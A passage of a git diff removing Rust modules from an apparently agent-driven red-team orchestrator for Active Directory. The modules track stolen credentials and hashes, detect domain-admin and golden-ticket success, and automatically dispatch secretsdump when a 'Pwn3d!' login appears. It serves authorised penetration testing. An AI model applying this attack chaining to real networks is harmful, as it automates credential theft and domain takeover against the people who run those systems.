hash_value: "aabbccdd".to_string(), - hash_type: "ntlm".to_string(), - domain: "FABRIKAM".to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - }]; - let fixed = normalize_hash_domains(&mut hashes, &map); - assert_eq!(fixed, 1); - assert_eq!(hashes[0].domain, "fabrikam.local"); - } - - #[test] - fn test_normalize_empty_slice() { - let map = make_map(); - let mut creds: Vec = vec![]; - assert_eq!(normalize_credential_domains(&mut creds, &map), 0); - } -} diff --git a/ares-orchestrator/src/recovery/requeue.rs b/ares-orchestrator/src/recovery/requeue.rs deleted file mode 100644 index c4b0ab75..00000000 --- a/ares-orchestrator/src/recovery/requeue.rs +++ /dev/null @@ -1,57 +0,0 @@ -//! Task requeuing (preserves original task_id). - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::info; - -use ares_core::models::TaskInfo; - -use crate::task_queue::{TaskMessage, TaskQueue, RESULT_QUEUE_PREFIX, TASK_QUEUE_PREFIX}; - -/// Requeue a task to its target role queue, preserving the original task_id. -/// -/// Uses RPUSH so retried tasks are consumed before new ones (workers BRPOP -/// from the right). -pub async fn requeue_task(queue: &TaskQueue, task_id: &str, task: &TaskInfo) -> Result<()> { - let mut payload = task - .params - .iter() - .map(|(k, v)| (k.clone(), v.clone())) - .collect::>(); - - // Add retry metadata - payload.insert( - "_retry_count".to_string(), - serde_json::Value::from(task.retry_count), - ); - payload.insert("_is_retry".to_string(), serde_json::Value::Bool(true)); - - let callback_queue = format!("{RESULT_QUEUE_PREFIX}:{task_id}"); - let msg = TaskMessage { - task_id: task_id.to_string(), - task_type: task.task_type.clone(), - source_agent: "orchestrator".to_string(), - target_agent: task.assigned_agent.clone(), - payload: serde_json::Value::Object(payload), - priority: 1, // High priority for retries - created_at: Some(chrono::Utc::now()), - callback_queue: Some(callback_queue), - }; - - let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", task.assigned_agent); - let json = serde_json::to_string(&msg).context("Failed to serialize requeue TaskMessage")?; - - let mut conn = queue.connection(); - conn.rpush::<_, _, ()>(&queue_key, &json) - .await - .with_context(|| format!("RPUSH to {} for requeue", queue_key))?; - - info!( - task_id = %task_id, - queue = %queue_key, - retry_count = task.retry_count, - "Requeued task (RPUSH)" - ); - - Ok(()) -} diff --git a/ares-orchestrator/src/recovery/resume_helper.rs b/ares-orchestrator/src/recovery/resume_helper.rs deleted file mode 100644 index 1f5a73f4..00000000 --- a/ares-orchestrator/src/recovery/resume_helper.rs +++ /dev/null @@ -1,165 +0,0 @@ -//! Post-recovery analysis helper. - -use std::collections::HashMap; -use std::fmt::Write as _; - -use ares_core::models::{Hash, SharedRedTeamState, TaskInfo, VulnerabilityInfo}; - -use super::types::{InterruptedTask, RetryingTask}; - -/// Post-recovery analysis helper. -/// -/// Provides convenience methods to inspect the recovered state and produce -/// a human-readable summary for the orchestrator. -#[allow(dead_code)] -pub struct OperationResumeHelper<'a> { - pub state: &'a SharedRedTeamState, - pub requeued_task_ids: &'a [String], - pub failed_task_ids: &'a [String], - /// Pending tasks loaded during recovery (task_id -> TaskInfo). 
- pub pending_tasks: &'a HashMap<String, TaskInfo>, -} - -#[allow(dead_code)] -impl<'a> OperationResumeHelper<'a> { - /// Get tasks that permanently failed (exceeded max retries during recovery). - pub fn get_interrupted_tasks(&self) -> Vec<InterruptedTask> { - let mut out = Vec::new(); - for task_id in self.failed_task_ids { - if let Some(task) = self.pending_tasks.get(task_id) { - out.push(InterruptedTask { - task_id: task_id.clone(), - task_type: task.task_type.clone(), - assigned_agent: task.assigned_agent.clone(), - retry_count: task.retry_count, - error: task.error.clone().unwrap_or_default(), - }); - } - } - out - } - - /// Get tasks that were auto-requeued and are currently retrying. - pub fn get_retrying_tasks(&self) -> Vec<RetryingTask> { - let mut out = Vec::new(); - for task_id in self.requeued_task_ids { - if let Some(task) = self.pending_tasks.get(task_id) { - out.push(RetryingTask { - task_id: task_id.clone(), - task_type: task.task_type.clone(), - assigned_agent: task.assigned_agent.clone(), - retry_count: task.retry_count, - max_retries: task.max_retries, - }); - } - } - out - } - - /// Get vulnerabilities that have been discovered but not yet exploited. - pub fn get_unexploited_vulnerabilities(&self) -> Vec<&VulnerabilityInfo> { - let mut vulns: Vec<&VulnerabilityInfo> = self - .state - .discovered_vulnerabilities - .values() - .filter(|v| !self.state.exploited_vulnerabilities.contains(&v.vuln_id)) - .collect(); - vulns.sort_by_key(|v| v.priority); - vulns - } - - /// Get hashes that have not been cracked yet. - pub fn get_uncracked_hashes(&self) -> Vec<&Hash> { - self.state - .all_hashes - .iter() - .filter(|h| h.cracked_password.is_none()) - .collect() - } - - /// Generate a human-readable summary of the recovery state. - pub fn get_resume_summary(&self) -> String { - let mut s = String::new(); - - let _ = writeln!(s, "OPERATION RESUMED AFTER RECOVERY"); - let _ = writeln!(s, "{}", "=".repeat(50)); - let _ = writeln!(s); - let _ = writeln!(s, "Operation ID: {}", self.state.operation_id); - let _ = writeln!(s, "Credentials found: {}", self.state.all_credentials.len()); - let _ = writeln!(s, "Hosts discovered: {}", self.state.all_hosts.len()); - let _ = writeln!( - s, - "Domain admin: {}", - if self.state.has_domain_admin { - "YES" - } else { - "NO" - } - ); - let _ = writeln!(s); - - // Retrying tasks - let retrying = self.get_retrying_tasks(); - if !retrying.is_empty() { - let _ = writeln!(s, "[RETRYING] {} tasks auto-requeued:", retrying.len()); - for task in retrying.iter().take(5) { - let _ = writeln!( - s, - " - {} -> {} (retry {}/{})", - task.task_type, task.assigned_agent, task.retry_count, task.max_retries - ); - } - let _ = writeln!(s); - } - - // Permanently failed tasks - let interrupted = self.get_interrupted_tasks(); - if !interrupted.is_empty() { - let _ = writeln!( - s, - "[FAILED] {} tasks exceeded max retries:", - interrupted.len() - ); - for task in interrupted.iter().take(5) { - let _ = writeln!( - s, - " - {} -> {} (retried {}x)", - task.task_type, task.assigned_agent, task.retry_count - ); - } - let _ = writeln!(s); - } - - // Unexploited vulnerabilities - let unexploited = self.get_unexploited_vulnerabilities(); - if !unexploited.is_empty() { - let _ = writeln!( - s, - "[PENDING] {} unexploited vulnerabilities:", - unexploited.len() - ); - for v in unexploited.iter().take(5) { - let _ = writeln!( - s, - " - {}: {} (priority {})", - v.vuln_type, v.target, v.priority - ); - } - let _ = writeln!(s); - } - - // Uncracked hashes - let uncracked = self.get_uncracked_hashes(); - if !uncracked.is_empty()
{ - let _ = writeln!(s, "[PENDING] {} uncracked hashes", uncracked.len()); - let _ = writeln!(s); - } - - if retrying.is_empty() && interrupted.is_empty() { - let _ = writeln!(s, "[OK] No interrupted tasks - clean recovery"); - let _ = writeln!(s); - } - - s - } -} diff --git a/ares-orchestrator/src/recovery/types.rs b/ares-orchestrator/src/recovery/types.rs deleted file mode 100644 index cc68ebce..00000000 --- a/ares-orchestrator/src/recovery/types.rs +++ /dev/null @@ -1,127 +0,0 @@ -//! Types and constants for operation recovery. - -use ares_core::models::{SharedRedTeamState, TaskStatus}; - -/// Maximum number of retries before a task is considered permanently failed. -pub const MAX_RETRIES: i32 = 3; - -/// Statuses that indicate an interrupted task eligible for re-enqueue. -pub const INTERRUPTED_STATUSES: &[TaskStatus] = &[ - TaskStatus::Pending, - TaskStatus::InProgress, - TaskStatus::Retrying, -]; - -/// Keywords that signal a transient Redis connection error. -pub const CONNECTION_ERROR_KEYWORDS: &[&str] = &[ - "connection", - "connect", - "closed", - "timeout", - "broken pipe", - "reset", - "reading from", -]; - -/// Maximum number of retry attempts for transient Redis connection errors. -pub const MAX_CONNECTION_RETRIES: u32 = 3; - -/// Check if an error looks like a transient Redis connection failure. -pub fn is_connection_error(err: &anyhow::Error) -> bool { - let msg = err.to_string().to_lowercase(); - CONNECTION_ERROR_KEYWORDS.iter().any(|kw| msg.contains(kw)) -} - -/// Result of a recovery operation. -#[derive(Debug)] -#[allow(dead_code)] -pub struct RecoveredState { - /// The full shared state loaded from Redis. - pub state: SharedRedTeamState, - /// Task IDs that were re-enqueued for retry. - pub requeued_task_ids: Vec<String>, - /// Task IDs that exceeded max retries and were marked failed. - pub failed_task_ids: Vec<String>, -} - -/// Info about a permanently failed task (exceeded max retries). -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct InterruptedTask { - pub task_id: String, - pub task_type: String, - pub assigned_agent: String, - pub retry_count: i32, - pub error: String, -} - -/// Info about a task that was auto-requeued for retry.
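`is_connection_error` and `MAX_CONNECTION_RETRIES`, defined just above, are intended to be paired in a retry loop. A minimal sketch of that pattern (the generic closure is a stand-in for any Redis read, and the 500 ms backoff step is an assumption):

```rust
async fn with_connection_retry<T, F, Fut>(mut op: F) -> anyhow::Result<T>
where
    F: FnMut() -> Fut,
    Fut: std::future::Future<Output = anyhow::Result<T>>,
{
    let mut attempts: u32 = 0;
    loop {
        match op().await {
            Ok(v) => return Ok(v),
            // Retry only transient connection failures; other errors surface immediately.
            Err(e) if is_connection_error(&e) && attempts < MAX_CONNECTION_RETRIES => {
                attempts += 1;
                tokio::time::sleep(std::time::Duration::from_millis(500 * u64::from(attempts))).await;
            }
            Err(e) => return Err(e),
        }
    }
}
```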
-#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct RetryingTask { - pub task_id: String, - pub task_type: String, - pub assigned_agent: String, - pub retry_count: i32, - pub max_retries: i32, -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_is_connection_error_connection() { - let err = anyhow::anyhow!("Redis connection refused"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_timeout() { - let err = anyhow::anyhow!("Operation timeout after 30s"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_broken_pipe() { - let err = anyhow::anyhow!("Broken pipe while writing"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_reset() { - let err = anyhow::anyhow!("Connection reset by peer"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_closed() { - let err = anyhow::anyhow!("Socket closed unexpectedly"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_case_insensitive() { - let err = anyhow::anyhow!("TIMEOUT waiting for response"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_not_connection_error() { - let err = anyhow::anyhow!("Key not found in Redis"); - assert!(!is_connection_error(&err)); - } - - #[test] - fn test_is_not_connection_error_parse() { - let err = anyhow::anyhow!("Failed to parse JSON response"); - assert!(!is_connection_error(&err)); - } - - #[test] - fn test_constants() { - assert_eq!(MAX_RETRIES, 3); - assert_eq!(MAX_CONNECTION_RETRIES, 3); - assert_eq!(INTERRUPTED_STATUSES.len(), 3); - } -} diff --git a/ares-orchestrator/src/result_processing/admin_checks.rs b/ares-orchestrator/src/result_processing/admin_checks.rs deleted file mode 100644 index 7d4179ad..00000000 --- a/ares-orchestrator/src/result_processing/admin_checks.rs +++ /dev/null @@ -1,328 +0,0 @@ -//! Domain admin indicator checks, golden ticket detection, Pwn3d! credential -//! upgrades, and domain SID extraction. - -use std::sync::Arc; - -use serde_json::Value; -use tracing::{info, warn}; - -use super::parsing::has_domain_admin_indicator; -use crate::dispatcher::Dispatcher; - -/// Check result for domain admin indicators and update state. 
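Two payload shapes count as a domain-admin indicator here; the `has_domain_admin_indicator` predicate lives in `parsing.rs` further down this patch. For example (field values illustrative):

```rust
#[test]
fn domain_admin_indicator_examples() {
    // Explicit flag reported by the agent, with an optional path description.
    let explicit = serde_json::json!({
        "has_domain_admin": true,
        "domain_admin_path": "kerberoast svc_sql -> crack -> DA"
    });
    // Implicit: a krbtgt hash in the result implies DCSync-level access.
    let implicit = serde_json::json!({
        "hashes": [{"username": "krbtgt", "domain": "contoso.local"}]
    });
    assert!(has_domain_admin_indicator(&explicit));
    assert!(has_domain_admin_indicator(&implicit));
}
```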
-pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: &Arc<Dispatcher>) { - if !has_domain_admin_indicator(payload) { - return; - } - let already_da = { - let state = dispatcher.state.read().await; - state.has_domain_admin - }; - let path = if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { - payload - .get("domain_admin_path") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - } else { - Some("secretsdump -> krbtgt hash".to_string()) - }; - if let Err(e) = dispatcher - .state - .set_domain_admin(&dispatcher.queue, path.clone()) - .await - { - warn!(err = %e, "Failed to set domain admin flag"); - } else { - info!("Domain Admin achieved!"); - } - if !already_da { - let (domain, dc_target) = { - let state = dispatcher.state.read().await; - let domain = state.domains.first().cloned().unwrap_or_default(); - let dc = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned() - .unwrap_or_else(|| domain.clone()); - (domain, dc) - }; - if !domain.is_empty() { - let vuln_id = format!("domain_admin_{}", domain.to_lowercase()); - let mut details = std::collections::HashMap::new(); - details.insert("domain".into(), serde_json::Value::String(domain.clone())); - if let Some(ref p) = path { - details.insert("path".into(), serde_json::Value::String(p.clone())); - } - details.insert( - "note".into(), - serde_json::Value::String( - "Domain admin achieved via agent-reported indicator".to_string(), - ), - ); - let vuln = ares_core::models::VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "domain_admin".to_string(), - target: dc_target, - discovered_by: "result_processing".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - } - } -} - -pub(crate) async fn check_golden_ticket_completion( - payload: &Value, - task_id: &str, - dispatcher: &Arc<Dispatcher>, ) { - if !task_id.contains("exploit") && !task_id.contains("golden") { - return; - } - { - let state = dispatcher.state.read().await; - if state.has_golden_ticket { - return; - } - } - let mut found_ticket = false; - let mut domain = String::new(); - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - let text = item - .as_str() - .or_else(|| item.get("output").and_then(|v| v.as_str())) - .unwrap_or(""); - if text.contains("Saving ticket in") && text.contains(".ccache") { - found_ticket = true; - break; - } - } - } - if !found_ticket { - for key in &["tool_output", "output", "summary"] { - if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { - if text.contains("Saving ticket in") && text.contains(".ccache") { - found_ticket = true; - break; - } - } - } - } - if !found_ticket && payload.get("has_golden_ticket").and_then(|v| v.as_bool()) == Some(true) { - found_ticket = true; - } - if !found_ticket { - return; - } - if let Some(d) = payload.get("domain").and_then(|v| v.as_str()) { - domain = d.to_string(); - } - if domain.is_empty() { - let state = dispatcher.state.read().await; - domain = state.domains.first().cloned().unwrap_or_default(); - } - if let Err(e) = dispatcher - .state - .set_golden_ticket(&dispatcher.queue, &domain) - .await - { - warn!(err = %e, "Failed to set golden ticket flag"); - } -} - -pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc<Dispatcher>) { - for line in
text.lines() { - if !line.contains("Pwn3d!") || !line.contains("[+]") { - continue; - } - if let Some(after_plus) = line.split("[+]").nth(1) { - let after_plus = after_plus.trim(); - if let Some(backslash) = after_plus.find('\\') { - let domain_part = after_plus[..backslash].trim(); - let rest = &after_plus[backslash + 1..]; - let username = if let Some(colon) = rest.find(':') { - &rest[..colon] - } else { - rest.split_whitespace().next().unwrap_or("") - }; - let username = username.trim(); - let domain = domain_part.to_lowercase(); - if username.is_empty() || domain.is_empty() { - continue; - } - info!(username = %username, domain = %domain, "Pwn3d! detected -- upgrading credential to admin"); - let upgraded = { - let mut state = dispatcher.state.write().await; - let mut found = false; - for cred in state.credentials.iter_mut() { - if cred.username.to_lowercase() == username.to_lowercase() - && cred.domain.to_lowercase() == domain - && !cred.is_admin - { - cred.is_admin = true; - found = true; - } - } - found - }; - if upgraded { - let pwned_ip = line - .split_whitespace() - .find(|w| { - w.split('.').count() == 4 - && w.split('.').all(|o| o.parse::<u8>().is_ok()) - }) - .map(|s| s.to_string()); - info!( - username = %username, - domain = %domain, - pwned_host = ?pwned_ip, - "Credential upgraded to admin -- dispatching priority secretsdump" - ); - let work: Vec<(String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - let dc_ips: Vec<String> = - state.domain_controllers.values().cloned().collect(); - let mut targets: Vec<String> = dc_ips; - if let Some(ref ip) = pwned_ip { - if !targets.contains(ip) { - targets.push(ip.clone()); - } - } - state - .credentials - .iter() - .filter(|c| { - c.username.to_lowercase() == username.to_lowercase() - && c.domain.to_lowercase() == domain - && c.is_admin - }) - .flat_map(|cred| { - targets - .iter() - .map(|ip| (ip.clone(), cred.clone())) - .collect::<Vec<_>>() - }) - .collect() - }; - for (target_ip, cred) in work { - match dispatcher.request_secretsdump(&target_ip, &cred, 1).await { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - target = %target_ip, - username = %username, - "Admin Pwn3d! secretsdump dispatched (priority 1)" - ); - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch Pwn3d!
secretsdump"), - } - } - } - } - } - } -} - -pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &Arc) { - let mut text_parts: Vec<&str> = Vec::new(); - for key in &["tool_output", "output"] { - if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - } - if text_parts.is_empty() { - return; - } - let combined = text_parts.join("\n"); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { - let domain = payload - .get("domain") - .and_then(|v| v.as_str()) - .map(|d| d.to_lowercase()) - .filter(|d| !d.is_empty()); - let domain = match domain { - Some(d) => d, - None => { - let state = dispatcher.state.read().await; - match state.domains.first() { - Some(d) => d.to_lowercase(), - None => return, - } - } - }; - let already_cached = { - let state = dispatcher.state.read().await; - state - .domain_sids - .get(&domain) - .map(|s| s == &sid) - .unwrap_or(false) - }; - if !already_cached { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { - warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); - } else { - info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); - dispatcher - .state - .write() - .await - .domain_sids - .insert(domain.clone(), sid); - } - } - if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { - let already_known = { - let state = dispatcher.state.read().await; - state.admin_names.contains_key(&domain) - }; - if !already_known { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { - warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); - } else { - info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); - dispatcher - .state - .write() - .await - .admin_names - .insert(domain, admin_name); - } - } - } - } -} diff --git a/ares-orchestrator/src/result_processing/discovery_polling.rs b/ares-orchestrator/src/result_processing/discovery_polling.rs deleted file mode 100644 index 68c7ba03..00000000 --- a/ares-orchestrator/src/result_processing/discovery_polling.rs +++ /dev/null @@ -1,190 +0,0 @@ -//! Background discovery polling. - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use redis::AsyncCommands; -use serde_json::Value; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; - -use super::parsing::resolve_parent_id; -use super::LOCKOUT_PATTERNS; -use crate::dispatcher::Dispatcher; - -pub async fn discovery_poller(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(5)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - if let Err(e) = poll_discoveries(&dispatcher).await { - debug!(err = %e, "Discovery poll error"); - } - } -} - -async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { - let key = dispatcher.state.discovery_key().await; - let mut conn = dispatcher.queue.connection(); - let discoveries: Vec<String> = conn.lrange(&key, 0, -1).await.unwrap_or_default(); - if discoveries.is_empty() { - return Ok(()); - } - let _: () = conn.del(&key).await?; - info!( - count = discoveries.len(), - "Processing real-time discoveries" - ); - for json_str in &discoveries { - let discovery: Value = match serde_json::from_str(json_str) { - Ok(v) => v, - Err(e) => { - warn!(err = %e, "Bad discovery JSON"); - continue; - } - }; - let disc_type = discovery - .get("type") - .and_then(|v| v.as_str()) - .unwrap_or("unknown"); - let data = match discovery.get("data") { - Some(d) => d, - None => continue, - }; - let input_username = discovery.get("input_username").and_then(|v| v.as_str()); - let input_domain = discovery.get("input_domain").and_then(|v| v.as_str()); - match disc_type { - "credential" => match serde_json::from_value::<Credential>(data.clone()) { - Ok(mut cred) => { - if cred.parent_id.is_none() { - let state = dispatcher.state.read().await; - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &cred.source, - &cred.username, - &cred.domain, - input_username, - input_domain, - ); - cred.parent_id = pid; - cred.attack_step = step; - drop(state); - } - let user_domain = format!("{}@{}", cred.username, cred.domain); - match dispatcher - .state - .publish_credential(&dispatcher.queue, cred) - .await - { - Ok(true) => { - info!(credential = %user_domain, "Discovery: credential published") - } - Ok(false) => { - debug!(credential = %user_domain, "Discovery: credential already known") - } - Err(e) => { - warn!(err = %e, credential = %user_domain, "Failed to publish discovered credential") - } - } - } - Err(e) => warn!(err = %e, "Failed to deserialize credential discovery"), - }, - "hash" => { - if let Ok(mut hash) = serde_json::from_value::<Hash>(data.clone()) { - if hash.parent_id.is_none() { - let state = dispatcher.state.read().await; - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &hash.source, - &hash.username, - &hash.domain, - input_username, - input_domain, - ); - hash.parent_id = pid; - hash.attack_step = step; - drop(state); - } - let _ = dispatcher.state.publish_hash(&dispatcher.queue, hash).await; - } - } - "vulnerability" | "delegation" => { - if let Ok(vuln) = serde_json::from_value::<VulnerabilityInfo>(data.clone()) { - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - } - } - "host" => match serde_json::from_value::<Host>(data.clone()) { - Ok(host) => { - let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; - } - Err(e) => { - warn!(err = %e, data = %data, "Failed to deserialize host discovery"); - } - }, - "share" => { - if let Ok(share) = serde_json::from_value::<Share>(data.clone()) { - let _ = dispatcher - .state - .publish_share(&dispatcher.queue, share) - .await; - } - } - "user" => { - if let Ok(user) = serde_json::from_value::<User>(data.clone()) { - if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { - let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; - } - } - } - other => { - debug!(disc_type = other, "Unknown discovery type, ignoring"); - } - } - } -
dispatcher.credential_access_notify.notify_waiters(); - dispatcher.delegation_notify.notify_waiters(); - let _ = dispatcher.notify_state_update().await; - Ok(()) -} - -/// Check if a task result contains lockout error indicators. -pub(crate) fn has_lockout_in_result(result: &crate::task_queue::TaskResult) -> bool { - if let Some(ref err) = result.error { - if LOCKOUT_PATTERNS.iter().any(|p| err.contains(p)) { - return true; - } - } - if let Some(ref payload) = result.result { - if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for output in outputs { - if let Some(text) = output.as_str() { - if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { - return true; - } - } - } - } - for key in &["summary", "output", "tool_output"] { - if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { - if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { - return true; - } - } - } - } - false -} diff --git a/ares-orchestrator/src/result_processing/mod.rs b/ares-orchestrator/src/result_processing/mod.rs deleted file mode 100644 index b871f245..00000000 --- a/ares-orchestrator/src/result_processing/mod.rs +++ /dev/null @@ -1,611 +0,0 @@ -//! Result processing and discovery polling. -//! -//! Handles completed task results: extracts discovered credentials, hashes, -//! hosts, and vulnerabilities from result payloads and publishes them to -//! shared state and Redis. -//! -//! Also polls the `ares:discoveries:{op_id}` LIST for real-time worker -//! discoveries that arrive outside the task result flow. - -pub mod admin_checks; -pub mod discovery_polling; -pub mod parsing; -#[cfg(test)] -mod tests; -pub mod timeline; - -// Re-exports consumed by callers outside this module -pub use discovery_polling::discovery_poller; - -use std::sync::Arc; - -use anyhow::Result; -use serde_json::Value; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::output_extraction; -use crate::results::CompletedTask; -use crate::throttling::Throttler; - -use self::admin_checks::{ - check_domain_admin_indicators, check_golden_ticket_completion, - detect_and_upgrade_admin_credentials, extract_and_cache_domain_sid, -}; -use self::discovery_polling::has_lockout_in_result; -use self::parsing::{parse_discoveries, resolve_parent_id}; -use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; - -/// Kerberos/SMB errors that indicate a credential is locked out. -pub(crate) const LOCKOUT_PATTERNS: &[&str] = - &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; - -/// Process a completed task result: extract discoveries and update state. 
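For reference, the entries polled from the discovery LIST are JSON objects shaped as `poll_discoveries` above expects; a worker-side credential discovery looks roughly like this (values illustrative):

```rust
fn example_discovery() -> serde_json::Value {
    serde_json::json!({
        "type": "credential",            // selects the deserialization branch
        "input_username": "jdoe",        // principal the producing task ran as (lineage hint)
        "input_domain": "contoso.local",
        "data": {                        // deserialized into ares_core::models::Credential
            "id": "c-1234",
            "username": "svc_sql",
            "password": "SqlPass1",
            "domain": "contoso.local",
            "source": "secretsdump",
            "is_admin": false,
            "attack_step": 0
        }
    })
}
```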
-pub async fn process_completed_task( - completed: &CompletedTask, - dispatcher: &Arc<Dispatcher>, - throttler: &Throttler, -) { - let task_id = &completed.task_id; - let result = &completed.result; - - let cred_key = { - let state = dispatcher.state.read().await; - state - .pending_tasks - .get(task_id.as_str()) - .and_then(|t| t.params.get("credential_key")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }; - - { - let core_result = ares_core::models::TaskResult { - task_id: task_id.clone(), - success: result.success, - result: result.result.clone(), - error: result.error.clone(), - completed_at: result.completed_at.unwrap_or_else(chrono::Utc::now), - }; - let _ = dispatcher - .state - .complete_task(&dispatcher.queue, task_id, core_result) - .await; - } - - if result.success { - info!( - task_id = %task_id, - agent = result.agent_name.as_deref().unwrap_or("unknown"), - "Task completed successfully" - ); - throttler.clear_rate_limit_error().await; - } else { - let err_msg = result.error.as_deref().unwrap_or("unknown error"); - warn!(task_id = %task_id, err = err_msg, "Task failed"); - - if err_msg.to_lowercase().contains("rate limit") || err_msg.to_lowercase().contains("429") { - throttler.record_rate_limit_error().await; - } - // Don't return early — failed tasks (MaxSteps, Error) may still carry - // parser-extracted discoveries from tool calls that ran before failure. - // All discoveries now come from regex parsers, not LLM hallucination. - } - - // Extract discoveries ONLY from the "discoveries" key — populated exclusively - // by ares-tools parsers in submission.rs. The top-level payload is LLM-generated - // and must never be fed into parse_discoveries() (hallucination risk). - if let Some(ref payload) = result.result { - if let Some(disc) = payload.get("discoveries") { - if let Err(e) = extract_discoveries(disc, dispatcher).await { - warn!(task_id = %task_id, err = %e, "Failed to extract parser discoveries"); - } - check_domain_admin_indicators(disc, dispatcher).await; - } - } - - // Secondary pass: regex-based extraction from raw text in the result. - // This catches discoveries that the per-tool parsers or LLM may have missed. - if let Some(ref payload) = result.result { - let default_domain = get_default_domain(dispatcher).await; - extract_from_raw_text(payload, dispatcher, &default_domain).await; - } - - // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). - // Caches the SID for golden ticket generation without needing lookupsid. - if let Some(ref payload) = result.result { - extract_and_cache_domain_sid(payload, dispatcher).await; - } - - // S4U auto-chain: detect .ccache in output and dispatch secretsdump with ticket. - // Mirrors Python's _auto_chain_s4u_lateral_movement — when a task produces a - // Kerberos ticket (.ccache), chain a secretsdump using that ticket for - // immediate credential extraction.
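The ccache-filename fallback in the code below is easiest to follow as a worked example. This standalone helper is hypothetical (the real logic is inlined in `auto_chain_s4u_secretsdump`), but it traces the same steps:

```rust
// "Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache"
//   strip user       -> "cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache"
//   take host part   -> "cifs_dc01.contoso.local"
//   '_' to '.'       -> "cifs.dc01.contoso.local"
//   drop service     -> "dc01.contoso.local"
fn target_from_ccache_name(fname: &str) -> Option<String> {
    let after_user = &fname[fname.find('@')? + 1..];
    let host_part = after_user.split('@').next()?.replace('_', ".");
    let candidate = &host_part[host_part.find('.')? + 1..];
    candidate.contains('.').then(|| candidate.to_string())
}

#[test]
fn maps_ccache_name_to_target() {
    assert_eq!(
        target_from_ccache_name("Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache").as_deref(),
        Some("dc01.contoso.local")
    );
}
```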
